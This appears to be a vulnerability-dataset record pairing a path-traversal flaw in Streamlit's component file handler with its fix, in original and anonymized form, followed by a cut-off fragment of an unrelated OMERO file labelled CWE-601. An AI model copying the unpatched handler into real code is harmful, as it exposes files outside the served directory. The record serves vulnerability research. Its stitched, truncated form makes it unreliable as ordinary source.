# We use a double-checked locking optimization to avoid the overhead
# of acquiring the lock in the common case:
# https://en.wikipedia.org/wiki/Double-checked_locking
if cls._instance is None:
with cls._instance_lock:
if cls._instance is None:
cls._instance = ComponentRegistry()
return cls._instance
def __init__(self):
self._components = {} # type: Dict[str, CustomComponent]
self._lock = threading.Lock()
def __repr__(self) -> str:
return util.repr_(self)
def register_component(self, component: CustomComponent) -> None:
"""Register a CustomComponent.
Parameters
----------
component : CustomComponent
The component to register.
"""
# Validate the component's path
abspath = component.abspath
if abspath is not None and not os.path.isdir(abspath):
raise StreamlitAPIException(f"No such component directory: '{abspath}'")
with self._lock:
existing = self._components.get(component.name)
self._components[component.name] = component
if existing is not None and component != existing:
LOGGER.warning(
"%s overriding previously-registered %s",
component,
existing,
)
LOGGER.debug("Registered component %s", component)
def get_component_path(self, name: str) -> Optional[str]:
"""Return the filesystem path for the component with the given name.
If no such component is registered, or if the component exists but is
being served from a URL, return None instead.
"""
component = self._components.get(name, None)
return component.abspath if component is not None else None
| # Copyright 2018-2022 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
import mimetypes
import os
import threading
from typing import Any, Dict, Optional, Type, Union
import tornado.web
from streamlit.scriptrunner import get_script_run_ctx
import streamlit.server.routes
from streamlit import type_util
from streamlit.elements.form import current_form_id
from streamlit import util
from streamlit.errors import StreamlitAPIException
from streamlit.logger import get_logger
from streamlit.proto.Components_pb2 import SpecialArg, ArrowTable as ArrowTableProto
from streamlit.proto.Element_pb2 import Element
from streamlit.state import NoValue, register_widget
from streamlit.type_util import to_bytes
LOGGER = get_logger(__name__)
class MarshallComponentException(StreamlitAPIException):
"""Class for exceptions generated during custom component marshalling."""
pass
class CustomComponent:
"""A Custom Component declaration."""
def __init__(
self,
name: str,
path: Optional[str] = None,
url: Optional[str] = None,
):
if (path is None and url is None) or (path is not None and url is not None):
raise StreamlitAPIException(
"Either 'path' or 'url' must be set, but not both."
)
self.name = name
self.path = path
self.url = url
def __repr__(self) -> str:
return util.repr_(self)
@property
def abspath(self) -> Optional[str]:
"""The absolute path that the component is served from."""
if self.path is None:
return None
return os.path.abspath(self.path)
def __call__(
self,
*args,
default: Any = None,
key: Optional[str] = None,
**kwargs,
) -> Any:
"""An alias for create_instance."""
return self.create_instance(*args, default=default, key=key, **kwargs)
def create_instance(
self,
*args,
default: Any = None,
key: Optional[str] = None,
**kwargs,
) -> Any:
"""Create a new instance of the component.
Parameters
----------
*args
Must be empty; all args must be named. (This parameter exists to
enforce correct use of the function.)
default: any or None
The default return value for the component. This is returned when
the component's frontend hasn't yet specified a value with
`setComponentValue`.
key: str or None
If not None, this is the user key we use to generate the
component's "widget ID".
**kwargs
Keyword args to pass to the component.
Returns
-------
any or None
The component's widget value.
"""
if len(args) > 0:
raise MarshallComponentException(f"Argument '{args[0]}' needs a label")
try:
import pyarrow
from streamlit.components.v1 import component_arrow
except ImportError:
raise StreamlitAPIException(
"""To use Custom Components in Streamlit, you need to install
PyArrow. To do so locally:
`pip install pyarrow`
And if you're using Streamlit Cloud, add "pyarrow" to your requirements.txt."""
)
# In addition to the custom kwargs passed to the component, we also
# send the special 'default' and 'key' params to the component
# frontend.
all_args = dict(kwargs, **{"default": default, "key": key})
json_args = {}
special_args = []
for arg_name, arg_val in all_args.items():
if type_util.is_bytes_like(arg_val):
bytes_arg = SpecialArg()
bytes_arg.key = arg_name
bytes_arg.bytes = to_bytes(arg_val)
special_args.append(bytes_arg)
elif type_util.is_dataframe_like(arg_val):
dataframe_arg = SpecialArg()
dataframe_arg.key = arg_name
component_arrow.marshall(dataframe_arg.arrow_dataframe.data, arg_val)
special_args.append(dataframe_arg)
else:
json_args[arg_name] = arg_val
try:
serialized_json_args = json.dumps(json_args)
except BaseException as e:
raise MarshallComponentException(
"Could not convert component args to JSON", e
)
def marshall_component(dg, element: Element) -> Union[Any, Type[NoValue]]:
element.component_instance.component_name = self.name
element.component_instance.form_id = current_form_id(dg)
if self.url is not None:
element.component_instance.url = self.url
# Normally, a widget's element_hash (which determines
# its identity across multiple runs of an app) is computed
# by hashing the entirety of its protobuf. This means that,
# if any of the arguments to the widget are changed, Streamlit
# considers it a new widget instance and it loses its previous
# state.
#
# However! If a *component* has a `key` argument, then the
# component's hash identity is determined by entirely by
# `component_name + url + key`. This means that, when `key`
# exists, the component will maintain its identity even when its
# other arguments change, and the component's iframe won't be
# remounted on the frontend.
#
# So: if `key` is None, we marshall the element's arguments
# *before* computing its widget_ui_value (which creates its hash).
# If `key` is not None, we marshall the arguments *after*.
def marshall_element_args():
element.component_instance.json_args = serialized_json_args
element.component_instance.special_args.extend(special_args)
if key is None:
marshall_element_args()
def deserialize_component(ui_value, widget_id=""):
# ui_value is an object from json, an ArrowTable proto, or a bytearray
return ui_value
ctx = get_script_run_ctx()
component_state = register_widget(
element_type="component_instance",
element_proto=element.component_instance,
user_key=key,
widget_func_name=self.name,
deserializer=deserialize_component,
serializer=lambda x: x,
ctx=ctx,
)
widget_value = component_state.value
if key is not None:
marshall_element_args()
if widget_value is None:
widget_value = default
elif isinstance(widget_value, ArrowTableProto):
widget_value = component_arrow.arrow_proto_to_dataframe(widget_value)
# widget_value will be either None or whatever the component's most
# recent setWidgetValue value is. We coerce None -> NoValue,
# because that's what DeltaGenerator._enqueue expects.
return widget_value if widget_value is not None else NoValue
# We currently only support writing to st._main, but this will change
# when we settle on an improved API in a post-layout world.
dg = streamlit._main
element = Element()
return_value = marshall_component(dg, element)
result = dg._enqueue(
"component_instance", element.component_instance, return_value
)
return result
def __eq__(self, other) -> bool:
"""Equality operator."""
return (
isinstance(other, CustomComponent)
and self.name == other.name
and self.path == other.path
and self.url == other.url
)
def __ne__(self, other) -> bool:
"""Inequality operator."""
return not self == other
def __str__(self) -> str:
return f"'{self.name}': {self.path if self.path is not None else self.url}"
def declare_component(
name: str,
path: Optional[str] = None,
url: Optional[str] = None,
) -> CustomComponent:
"""Create and register a custom component.
Parameters
----------
name: str
A short, descriptive name for the component. Like, "slider".
path: str or None
The path to serve the component's frontend files from. Either
`path` or `url` must be specified, but not both.
url: str or None
The URL that the component is served from. Either `path` or `url`
must be specified, but not both.
Returns
-------
CustomComponent
A CustomComponent that can be called like a function.
Calling the component will create a new instance of the component
in the Streamlit app.
"""
# Get our stack frame.
current_frame = inspect.currentframe()
assert current_frame is not None
# Get the stack frame of our calling function.
caller_frame = current_frame.f_back
assert caller_frame is not None
# Get the caller's module name. `__name__` gives us the module's
# fully-qualified name, which includes its package.
module = inspect.getmodule(caller_frame)
assert module is not None
module_name = module.__name__
# If the caller was the main module that was executed (that is, if the
# user executed `python my_component.py`), then this name will be
# "__main__" instead of the actual package name. In this case, we use
# the main module's filename, sans `.py` extension, as the component name.
if module_name == "__main__":
file_path = inspect.getfile(caller_frame)
filename = os.path.basename(file_path)
module_name, _ = os.path.splitext(filename)
# Build the component name.
component_name = f"{module_name}.{name}"
# Create our component object, and register it.
component = CustomComponent(name=component_name, path=path, url=url)
ComponentRegistry.instance().register_component(component)
return component
class ComponentRequestHandler(tornado.web.RequestHandler):
def initialize(self, registry: "ComponentRegistry"):
self._registry = registry
def get(self, path: str) -> None:
parts = path.split("/")
component_name = parts[0]
component_root = self._registry.get_component_path(component_name)
if component_root is None:
self.write("not found")
self.set_status(404)
return
# follow symlinks to get an accurate normalized path
component_root = os.path.realpath(component_root)
filename = "/".join(parts[1:])
abspath = os.path.realpath(os.path.join(component_root, filename))
# Do NOT expose anything outside of the component root.
if os.path.commonprefix([component_root, abspath]) != component_root:
self.write("forbidden")
self.set_status(403)
return
LOGGER.debug("ComponentRequestHandler: GET: %s -> %s", path, abspath)
try:
with open(abspath, "rb") as file:
contents = file.read()
except (OSError) as e:
LOGGER.error(f"ComponentRequestHandler: GET {path} read error", exc_info=e)
self.write("read error")
self.set_status(404)
return
self.write(contents)
self.set_header("Content-Type", self.get_content_type(abspath))
self.set_extra_headers(path)
def set_extra_headers(self, path) -> None:
"""Disable cache for HTML files.
Other assets like JS and CSS are suffixed with their hash, so they can
be cached indefinitely.
"""
is_index_url = len(path) == 0
if is_index_url or path.endswith(".html"):
self.set_header("Cache-Control", "no-cache")
else:
self.set_header("Cache-Control", "public")
def set_default_headers(self) -> None:
if streamlit.server.routes.allow_cross_origin_requests():
self.set_header("Access-Control-Allow-Origin", "*")
def options(self) -> None:
"""/OPTIONS handler for preflight CORS checks."""
self.set_status(204)
self.finish()
@staticmethod
def get_content_type(abspath) -> str:
"""Returns the ``Content-Type`` header to be used for this request.
From tornado.web.StaticFileHandler.
"""
mime_type, encoding = mimetypes.guess_type(abspath)
# per RFC 6713, use the appropriate type for a gzip compressed file
if encoding == "gzip":
return "application/gzip"
# As of 2015-07-21 there is no bzip2 encoding defined at
# http://www.iana.org/assignments/media-types/media-types.xhtml
# So for that (and any other encoding), use octet-stream.
elif encoding is not None:
return "application/octet-stream"
elif mime_type is not None:
return mime_type
# if mime_type not detected, use application/octet-stream
else:
return "application/octet-stream"
@staticmethod
def get_url(file_id: str) -> str:
"""Return the URL for a component file with the given ID."""
return "components/{}".format(file_id)
class ComponentRegistry:
_instance_lock: threading.Lock = threading.Lock()
_instance: Optional["ComponentRegistry"] = None
@classmethod
def instance(cls) -> "ComponentRegistry":
"""Returns the singleton ComponentRegistry"""
# We use a double-checked locking optimization to avoid the overhead
# of acquiring the lock in the common case:
# https://en.wikipedia.org/wiki/Double-checked_locking
if cls._instance is None:
with cls._instance_lock:
if cls._instance is None:
cls._instance = ComponentRegistry()
return cls._instance
def __init__(self):
self._components = {} # type: Dict[str, CustomComponent]
self._lock = threading.Lock()
def __repr__(self) -> str:
return util.repr_(self)
def register_component(self, component: CustomComponent) -> None:
"""Register a CustomComponent.
Parameters
----------
component : CustomComponent
The component to register.
"""
# Validate the component's path
abspath = component.abspath
if abspath is not None and not os.path.isdir(abspath):
raise StreamlitAPIException(f"No such component directory: '{abspath}'")
with self._lock:
existing = self._components.get(component.name)
self._components[component.name] = component
if existing is not None and component != existing:
LOGGER.warning(
"%s overriding previously-registered %s",
component,
existing,
)
LOGGER.debug("Registered component %s", component)
def get_component_path(self, name: str) -> Optional[str]:
"""Return the filesystem path for the component with the given name.
If no such component is registered, or if the component exists but is
being served from a URL, return None instead.
"""
component = self._components.get(name, None)
return component.abspath if component is not None else None
| path_disclosure | {
"code": [
" abspath = os.path.join(component_root, filename)"
],
"line_no": [
320
]
} | {
"code": [
" component_root = os.path.realpath(component_root)",
" abspath = os.path.realpath(os.path.join(component_root, filename))",
" if os.path.commonprefix([component_root, abspath]) != component_root:",
" self.write(\"forbidden\")",
" self.set_status(403)",
" return"
],
"line_no": [
320,
322,
325,
326,
327,
328
]
} |
import inspect
import json
import mimetypes
import os
import threading
from typing import Any, Dict, Optional, Type, Union
import tornado.web
from streamlit.scriptrunner import .get_script_run_ctx
import streamlit.server.routes
from streamlit import type_util
from streamlit.elements.form import current_form_id
from streamlit import util
from streamlit.errors import StreamlitAPIException
from streamlit.logger import .get_logger
from streamlit.proto.Components_pb2 import SpecialArg, ArrowTable as ArrowTableProto
from streamlit.proto.Element_pb2 import Element
from streamlit.state import NoValue, register_widget
from streamlit.type_util import to_bytes
VAR_0 = get_logger(__name__)
class CLASS_0(StreamlitAPIException):
pass
class CLASS_1:
def __init__(
self,
VAR_1: str,
VAR_2: Optional[str] = None,
VAR_3: Optional[str] = None,
):
if (VAR_2 is None and VAR_3 is None) or (VAR_2 is not None and VAR_3 is not None):
raise StreamlitAPIException(
"Either 'path' or 'url' must be set, but not both."
)
self.name = VAR_1
self.path = VAR_2
self.url = VAR_3
def __repr__(self) -> str:
return util.repr_(self)
@property
def VAR_16(self) -> Optional[str]:
if self.path is None:
return None
return os.path.abspath(self.path)
def __call__(
self,
*VAR_4,
VAR_5: Any = None,
VAR_6: Optional[str] = None,
**VAR_7,
) -> Any:
return self.create_instance(*VAR_4, VAR_5=default, VAR_6=key, **VAR_7)
def FUNC_2(
self,
*VAR_4,
VAR_5: Any = None,
VAR_6: Optional[str] = None,
**VAR_7,
) -> Any:
if len(VAR_4) > 0:
raise CLASS_0(f"Argument '{VAR_4[0]}' needs a label")
try:
import pyarrow
from streamlit.components.v1 import .component_arrow
except ImportError:
raise StreamlitAPIException(
"""To use Custom Components in Streamlit, you need to install
PyArrow. To do so locally:
`pip install pyarrow`
And if you're using Streamlit Cloud, add "pyarrow" to your requirements.txt."""
)
VAR_19 = dict(VAR_7, **{"default": VAR_5, "key": VAR_6})
VAR_20 = {}
VAR_21 = []
for VAR_44, arg_val in VAR_19.items():
if type_util.is_bytes_like(arg_val):
VAR_41 = SpecialArg()
VAR_41.key = VAR_44
VAR_41.bytes = to_bytes(arg_val)
VAR_21.append(VAR_41)
elif type_util.is_dataframe_like(arg_val):
VAR_43 = SpecialArg()
VAR_43.key = VAR_44
component_arrow.marshall(VAR_43.arrow_dataframe.data, arg_val)
VAR_21.append(VAR_43)
else:
VAR_20[VAR_44] = arg_val
try:
VAR_34 = json.dumps(VAR_20)
except BaseException as e:
raise CLASS_0(
"Could not convert VAR_14 VAR_4 to JSON", e
)
def FUNC_13(VAR_22, VAR_23: Element) -> Union[Any, Type[NoValue]]:
VAR_23.component_instance.component_name = self.name
VAR_23.component_instance.form_id = current_form_id(VAR_22)
if self.url is not None:
VAR_23.component_instance.url = self.url
def FUNC_14():
VAR_23.component_instance.json_args = VAR_34
VAR_23.component_instance.special_args.extend(VAR_21)
if VAR_6 is None:
FUNC_14()
def FUNC_15(VAR_35, VAR_36=""):
return VAR_35
VAR_37 = get_script_run_ctx()
VAR_38 = register_widget(
element_type="component_instance",
element_proto=VAR_23.component_instance,
user_key=VAR_6,
widget_func_name=self.name,
deserializer=FUNC_15,
serializer=lambda x: x,
VAR_37=ctx,
)
VAR_39 = VAR_38.value
if VAR_6 is not None:
FUNC_14()
if VAR_39 is None:
VAR_39 = VAR_5
elif isinstance(VAR_39, ArrowTableProto):
VAR_39 = component_arrow.arrow_proto_to_dataframe(VAR_39)
return VAR_39 if VAR_39 is not None else NoValue
VAR_22 = streamlit._main
VAR_23 = Element()
VAR_24 = FUNC_13(VAR_22, VAR_23)
VAR_25 = VAR_22._enqueue(
"component_instance", VAR_23.component_instance, VAR_24
)
return VAR_25
def __eq__(self, VAR_8) -> bool:
return (
isinstance(VAR_8, CLASS_1)
and self.name == VAR_8.name
and self.path == VAR_8.path
and self.url == VAR_8.url
)
def __ne__(self, VAR_8) -> bool:
return not self == VAR_8
def __str__(self) -> str:
return f"'{self.name}': {self.path if self.path is not None else self.url}"
def FUNC_0(
VAR_1: str,
VAR_2: Optional[str] = None,
VAR_3: Optional[str] = None,
) -> CLASS_1:
VAR_9 = inspect.currentframe()
assert VAR_9 is not None
VAR_10 = VAR_9.f_back
assert VAR_10 is not None
VAR_11 = inspect.getmodule(VAR_10)
assert VAR_11 is not None
VAR_12 = VAR_11.__name__
if VAR_12 == "__main__":
VAR_26 = inspect.getfile(VAR_10)
VAR_27 = os.path.basename(VAR_26)
VAR_12, VAR_28 = os.path.splitext(VAR_27)
VAR_13 = f"{VAR_12}.{VAR_1}"
VAR_14 = CLASS_1(VAR_1=VAR_13, VAR_2=path, VAR_3=url)
CLASS_3.instance().register_component(VAR_14)
return VAR_14
class CLASS_2(tornado.web.RequestHandler):
def FUNC_3(self, VAR_15: "ComponentRegistry"):
self._registry = VAR_15
def FUNC_4(self, VAR_2: str) -> None:
VAR_29 = VAR_2.split("/")
VAR_13 = VAR_29[0]
VAR_30 = self._registry.get_component_path(VAR_13)
if VAR_30 is None:
self.write("not found")
self.set_status(404)
return
VAR_27 = "/".join(VAR_29[1:])
VAR_16 = os.path.join(VAR_30, VAR_27)
VAR_0.debug("ComponentRequestHandler: GET: %s -> %s", VAR_2, VAR_16)
try:
with open(VAR_16, "rb") as file:
VAR_42 = file.read()
except (OSError) as e:
VAR_0.error(f"ComponentRequestHandler: GET {VAR_2} read error", exc_info=e)
self.write("read error")
self.set_status(404)
return
self.write(VAR_42)
self.set_header("Content-Type", self.get_content_type(VAR_16))
self.set_extra_headers(VAR_2)
def FUNC_5(self, VAR_2) -> None:
VAR_31 = len(VAR_2) == 0
if VAR_31 or VAR_2.endswith(".html"):
self.set_header("Cache-Control", "no-cache")
else:
self.set_header("Cache-Control", "public")
def FUNC_6(self) -> None:
if streamlit.server.routes.allow_cross_origin_requests():
self.set_header("Access-Control-Allow-Origin", "*")
def FUNC_7(self) -> None:
self.set_status(204)
self.finish()
@staticmethod
def FUNC_8(VAR_16) -> str:
VAR_32, VAR_33 = mimetypes.guess_type(VAR_16)
if VAR_33 == "gzip":
return "application/gzip"
elif VAR_33 is not None:
return "application/octet-stream"
elif VAR_32 is not None:
return VAR_32
else:
return "application/octet-stream"
@staticmethod
def FUNC_9(VAR_17: str) -> str:
return "components/{}".format(VAR_17)
class CLASS_3:
_instance_lock: threading.Lock = threading.Lock()
_instance: Optional["ComponentRegistry"] = None
@classmethod
def FUNC_10(VAR_18) -> "ComponentRegistry":
if VAR_18._instance is None:
with VAR_18._instance_lock:
if VAR_18._instance is None:
VAR_18._instance = CLASS_3()
return VAR_18._instance
def __init__(self):
self._components = {} # type: Dict[str, CLASS_1]
self._lock = threading.Lock()
def __repr__(self) -> str:
return util.repr_(self)
def FUNC_11(self, VAR_14: CLASS_1) -> None:
VAR_16 = VAR_14.abspath
if VAR_16 is not None and not os.path.isdir(VAR_16):
raise StreamlitAPIException(f"No such VAR_14 directory: '{VAR_16}'")
with self._lock:
VAR_40 = self._components.get(VAR_14.name)
self._components[VAR_14.name] = VAR_14
if VAR_40 is not None and VAR_14 != VAR_40:
VAR_0.warning(
"%s overriding previously-registered %s",
VAR_14,
VAR_40,
)
VAR_0.debug("Registered VAR_14 %s", VAR_14)
def FUNC_12(self, VAR_1: str) -> Optional[str]:
VAR_14 = self._components.get(VAR_1, None)
return VAR_14.abspath if VAR_14 is not None else None
|
import inspect
import json
import mimetypes
import os
import threading
from typing import Any, Dict, Optional, Type, Union
import tornado.web
from streamlit.scriptrunner import .get_script_run_ctx
import streamlit.server.routes
from streamlit import type_util
from streamlit.elements.form import current_form_id
from streamlit import util
from streamlit.errors import StreamlitAPIException
from streamlit.logger import .get_logger
from streamlit.proto.Components_pb2 import SpecialArg, ArrowTable as ArrowTableProto
from streamlit.proto.Element_pb2 import Element
from streamlit.state import NoValue, register_widget
from streamlit.type_util import to_bytes
VAR_0 = get_logger(__name__)
class CLASS_0(StreamlitAPIException):
pass
class CLASS_1:
def __init__(
self,
VAR_1: str,
VAR_2: Optional[str] = None,
VAR_3: Optional[str] = None,
):
if (VAR_2 is None and VAR_3 is None) or (VAR_2 is not None and VAR_3 is not None):
raise StreamlitAPIException(
"Either 'path' or 'url' must be set, but not both."
)
self.name = VAR_1
self.path = VAR_2
self.url = VAR_3
def __repr__(self) -> str:
return util.repr_(self)
@property
def VAR_16(self) -> Optional[str]:
if self.path is None:
return None
return os.path.abspath(self.path)
def __call__(
self,
*VAR_4,
VAR_5: Any = None,
VAR_6: Optional[str] = None,
**VAR_7,
) -> Any:
return self.create_instance(*VAR_4, VAR_5=default, VAR_6=key, **VAR_7)
def FUNC_2(
self,
*VAR_4,
VAR_5: Any = None,
VAR_6: Optional[str] = None,
**VAR_7,
) -> Any:
if len(VAR_4) > 0:
raise CLASS_0(f"Argument '{VAR_4[0]}' needs a label")
try:
import pyarrow
from streamlit.components.v1 import .component_arrow
except ImportError:
raise StreamlitAPIException(
"""To use Custom Components in Streamlit, you need to install
PyArrow. To do so locally:
`pip install pyarrow`
And if you're using Streamlit Cloud, add "pyarrow" to your requirements.txt."""
)
VAR_19 = dict(VAR_7, **{"default": VAR_5, "key": VAR_6})
VAR_20 = {}
VAR_21 = []
for VAR_44, arg_val in VAR_19.items():
if type_util.is_bytes_like(arg_val):
VAR_41 = SpecialArg()
VAR_41.key = VAR_44
VAR_41.bytes = to_bytes(arg_val)
VAR_21.append(VAR_41)
elif type_util.is_dataframe_like(arg_val):
VAR_43 = SpecialArg()
VAR_43.key = VAR_44
component_arrow.marshall(VAR_43.arrow_dataframe.data, arg_val)
VAR_21.append(VAR_43)
else:
VAR_20[VAR_44] = arg_val
try:
VAR_34 = json.dumps(VAR_20)
except BaseException as e:
raise CLASS_0(
"Could not convert VAR_14 VAR_4 to JSON", e
)
def FUNC_13(VAR_22, VAR_23: Element) -> Union[Any, Type[NoValue]]:
VAR_23.component_instance.component_name = self.name
VAR_23.component_instance.form_id = current_form_id(VAR_22)
if self.url is not None:
VAR_23.component_instance.url = self.url
def FUNC_14():
VAR_23.component_instance.json_args = VAR_34
VAR_23.component_instance.special_args.extend(VAR_21)
if VAR_6 is None:
FUNC_14()
def FUNC_15(VAR_35, VAR_36=""):
return VAR_35
VAR_37 = get_script_run_ctx()
VAR_38 = register_widget(
element_type="component_instance",
element_proto=VAR_23.component_instance,
user_key=VAR_6,
widget_func_name=self.name,
deserializer=FUNC_15,
serializer=lambda x: x,
VAR_37=ctx,
)
VAR_39 = VAR_38.value
if VAR_6 is not None:
FUNC_14()
if VAR_39 is None:
VAR_39 = VAR_5
elif isinstance(VAR_39, ArrowTableProto):
VAR_39 = component_arrow.arrow_proto_to_dataframe(VAR_39)
return VAR_39 if VAR_39 is not None else NoValue
VAR_22 = streamlit._main
VAR_23 = Element()
VAR_24 = FUNC_13(VAR_22, VAR_23)
VAR_25 = VAR_22._enqueue(
"component_instance", VAR_23.component_instance, VAR_24
)
return VAR_25
def __eq__(self, VAR_8) -> bool:
return (
isinstance(VAR_8, CLASS_1)
and self.name == VAR_8.name
and self.path == VAR_8.path
and self.url == VAR_8.url
)
def __ne__(self, VAR_8) -> bool:
return not self == VAR_8
def __str__(self) -> str:
return f"'{self.name}': {self.path if self.path is not None else self.url}"
def FUNC_0(
VAR_1: str,
VAR_2: Optional[str] = None,
VAR_3: Optional[str] = None,
) -> CLASS_1:
VAR_9 = inspect.currentframe()
assert VAR_9 is not None
VAR_10 = VAR_9.f_back
assert VAR_10 is not None
VAR_11 = inspect.getmodule(VAR_10)
assert VAR_11 is not None
VAR_12 = VAR_11.__name__
if VAR_12 == "__main__":
VAR_26 = inspect.getfile(VAR_10)
VAR_27 = os.path.basename(VAR_26)
VAR_12, VAR_28 = os.path.splitext(VAR_27)
VAR_13 = f"{VAR_12}.{VAR_1}"
VAR_14 = CLASS_1(VAR_1=VAR_13, VAR_2=path, VAR_3=url)
CLASS_3.instance().register_component(VAR_14)
return VAR_14
class CLASS_2(tornado.web.RequestHandler):
def FUNC_3(self, VAR_15: "ComponentRegistry"):
self._registry = VAR_15
def FUNC_4(self, VAR_2: str) -> None:
VAR_29 = VAR_2.split("/")
VAR_13 = VAR_29[0]
VAR_30 = self._registry.get_component_path(VAR_13)
if VAR_30 is None:
self.write("not found")
self.set_status(404)
return
VAR_30 = os.path.realpath(VAR_30)
VAR_27 = "/".join(VAR_29[1:])
VAR_16 = os.path.realpath(os.path.join(VAR_30, VAR_27))
if os.path.commonprefix([VAR_30, VAR_16]) != VAR_30:
self.write("forbidden")
self.set_status(403)
return
VAR_0.debug("ComponentRequestHandler: GET: %s -> %s", VAR_2, VAR_16)
try:
with open(VAR_16, "rb") as file:
VAR_42 = file.read()
except (OSError) as e:
VAR_0.error(f"ComponentRequestHandler: GET {VAR_2} read error", exc_info=e)
self.write("read error")
self.set_status(404)
return
self.write(VAR_42)
self.set_header("Content-Type", self.get_content_type(VAR_16))
self.set_extra_headers(VAR_2)
def FUNC_5(self, VAR_2) -> None:
VAR_31 = len(VAR_2) == 0
if VAR_31 or VAR_2.endswith(".html"):
self.set_header("Cache-Control", "no-cache")
else:
self.set_header("Cache-Control", "public")
def FUNC_6(self) -> None:
if streamlit.server.routes.allow_cross_origin_requests():
self.set_header("Access-Control-Allow-Origin", "*")
def FUNC_7(self) -> None:
self.set_status(204)
self.finish()
@staticmethod
def FUNC_8(VAR_16) -> str:
VAR_32, VAR_33 = mimetypes.guess_type(VAR_16)
if VAR_33 == "gzip":
return "application/gzip"
elif VAR_33 is not None:
return "application/octet-stream"
elif VAR_32 is not None:
return VAR_32
else:
return "application/octet-stream"
@staticmethod
def FUNC_9(VAR_17: str) -> str:
return "components/{}".format(VAR_17)
class CLASS_3:
_instance_lock: threading.Lock = threading.Lock()
_instance: Optional["ComponentRegistry"] = None
@classmethod
def FUNC_10(VAR_18) -> "ComponentRegistry":
if VAR_18._instance is None:
with VAR_18._instance_lock:
if VAR_18._instance is None:
VAR_18._instance = CLASS_3()
return VAR_18._instance
def __init__(self):
self._components = {} # type: Dict[str, CLASS_1]
self._lock = threading.Lock()
def __repr__(self) -> str:
return util.repr_(self)
def FUNC_11(self, VAR_14: CLASS_1) -> None:
VAR_16 = VAR_14.abspath
if VAR_16 is not None and not os.path.isdir(VAR_16):
raise StreamlitAPIException(f"No such VAR_14 directory: '{VAR_16}'")
with self._lock:
VAR_40 = self._components.get(VAR_14.name)
self._components[VAR_14.name] = VAR_14
if VAR_40 is not None and VAR_14 != VAR_40:
VAR_0.warning(
"%s overriding previously-registered %s",
VAR_14,
VAR_40,
)
VAR_0.debug("Registered VAR_14 %s", VAR_14)
def FUNC_12(self, VAR_1: str) -> Optional[str]:
VAR_14 = self._components.get(VAR_1, None)
return VAR_14.abspath if VAR_14 is not None else None
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
21,
24,
35,
37,
38,
41,
43,
44,
47,
58,
62,
65,
72,
82,
91,
106,
111,
115,
123,
125,
128,
129,
130,
131,
133,
149,
156,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
184,
187,
189,
191,
203,
206,
211,
212,
213,
214,
216,
217,
218,
220,
226,
228,
237,
241,
244,
245,
252,
263,
270,
272,
273,
276,
277,
280,
281,
282,
286,
287,
288,
289,
290,
295,
296,
298,
299,
302,
304,
305,
309,
318,
321,
323,
332,
335,
337,
340,
345,
350,
354,
359,
366,
369,
370,
371,
376,
379,
384,
385,
389,
393,
394,
395,
401,
405,
408,
411,
417,
418,
422,
426,
433,
435,
438,
444,
40,
46,
251,
252,
253,
254,
255,
256,
257,
258,
259,
260,
261,
262,
263,
264,
265,
266,
267,
268,
269,
270,
271,
68,
80,
90,
91,
92,
93,
94,
95,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
112,
230,
239,
339,
340,
341,
342,
343,
356,
362,
363,
364,
382,
392,
410,
411,
412,
413,
414,
415,
416,
437,
438,
439,
440,
441
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
21,
24,
35,
37,
38,
41,
43,
44,
47,
58,
62,
65,
72,
82,
91,
106,
111,
115,
123,
125,
128,
129,
130,
131,
133,
149,
156,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
184,
187,
189,
191,
203,
206,
211,
212,
213,
214,
216,
217,
218,
220,
226,
228,
237,
241,
244,
245,
252,
263,
270,
272,
273,
276,
277,
280,
281,
282,
286,
287,
288,
289,
290,
295,
296,
298,
299,
302,
304,
305,
309,
318,
319,
323,
324,
329,
331,
340,
343,
345,
348,
353,
358,
362,
367,
374,
377,
378,
379,
384,
387,
392,
393,
397,
401,
402,
403,
409,
413,
416,
419,
425,
426,
430,
434,
441,
443,
446,
452,
40,
46,
251,
252,
253,
254,
255,
256,
257,
258,
259,
260,
261,
262,
263,
264,
265,
266,
267,
268,
269,
270,
271,
68,
80,
90,
91,
92,
93,
94,
95,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
112,
230,
239,
347,
348,
349,
350,
351,
364,
370,
371,
372,
390,
400,
418,
419,
420,
421,
422,
423,
424,
445,
446,
447,
448,
449
] |
4CWE-601
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
#
# Copyright (c) 2008-2015 University of Dundee.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author: Aleksandra Tarkowska <A(dot)Tarkowska(at)dundee(dot)ac(dot)uk>, 2008.
#
# Version: 1.0
#
import datetime
import time
import logging
from django.conf import settings
from django import forms
from django.forms.formsets import formset_factory
from django.core.urlresolvers import reverse
from omeroweb.custom_forms import NonASCIIForm
from .custom_forms import MetadataModelChoiceField
from .custom_forms import AnnotationModelMultipleChoiceField
from .custom_forms import ObjectModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import ExperimenterModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import GroupModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import GroupModelChoiceField
from omeroweb.webclient.webclient_utils import formatPercentFraction
logger = logging.getLogger(__name__)
##################################################################
# Static values
# TODO: change to reverse
help_button = "%swebgateway/img/help16.png" % settings.STATIC_URL
help_enable = (
'<span class="tooltip" title="Enable/Disable: This option'
' allows the owner to keep the access control of the share.">'
